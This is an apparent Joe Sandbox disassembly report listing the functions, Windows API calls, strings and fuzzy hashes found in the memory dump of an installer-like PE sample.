Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D

Function 0046EAC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39

Strings

Creating directory: %s, xrefs: 0046EB82

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ChangeNotify$ErrorFullLastNamePath
String ID: Creating directory: %s
API String ID: 2451617938-483064649
Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99

Function 004542F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408

Strings

SfcIsFileProtected, xrefs: 00454398
sfc.dll, xrefs: 00454360

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2508298434-591603554
Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D

Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
UnregisterClassA.USER32(?,00400000), ref: 004164BB
RegisterClassA.USER32(?), ref: 004164DE

Strings

@, xrefs: 00416439

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 877b472e956cf60183337d46f988a388bb6c78a10cf8e4cbe7dc1b050eece8f4
Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
Opcode Fuzzy Hash: 877b472e956cf60183337d46f988a388bb6c78a10cf8e4cbe7dc1b050eece8f4
Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A

Function 00451B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

74D41520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
74D41500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
74D41540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7

Strings

j]I, xrefs: 00451B76

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: D41500D41520D41540
String ID: j]I
API String ID: 2153611984-3121892809
Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765

Function 00451E48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4

Strings

XtE, xrefs: 00451E86, 00451E89
ptE, xrefs: 00451E8E, 00451E91

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: XtE$ptE
API String ID: 2919029540-3149052308
Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64

Function 0042EBAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C

Strings

shlwapi.dll, xrefs: 0042EBE7
SHAutoComplete, xrefs: 0042EC16

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
String ID: SHAutoComplete$shlwapi.dll
API String ID: 395431579-1506664499
Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D

Function 00454F2C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
PendingFileRenameOperations2, xrefs: 00454F6B
PendingFileRenameOperations, xrefs: 00454F5C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C

Function 00471114 Relevance: 6.3, APIs: 4, Instructions: 263fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54

Function 0047E350 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54

Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00421371
SetMenu.USER32(00000000,00000000), ref: 0042138E
SetMenu.USER32(00000000,00000000), ref: 004213C3
SetMenu.USER32(00000000,00000000), ref: 004213DF

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D

Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 00416B94
SetTextColor.GDI32(?,00000000), ref: 00416BAE
SetBkColor.GDI32(?,00000000), ref: 00416BC8
CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69

Function 00454498 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32(?,00000032), ref: 004544C4
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668

Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A24620A480A570EnumFonts
String ID:
API String ID: 2630238358-0
Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E

Function 0045B984 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93

FlushFileBuffers.KERNEL32(?), ref: 0045BBB9

Strings

EndOffset range exceeded, xrefs: 0045BAED
NumRecs range exceeded, xrefs: 0045BAB6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54

Function 0049706C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356

Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E

Part of subcall function 00409B88: 6F551CD0.COMCTL32(0049708E), ref: 00409B88

Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2

Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050

Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9

Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F

Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890

Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0

Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31

Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39

Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB

Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D

SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD

Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C

Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

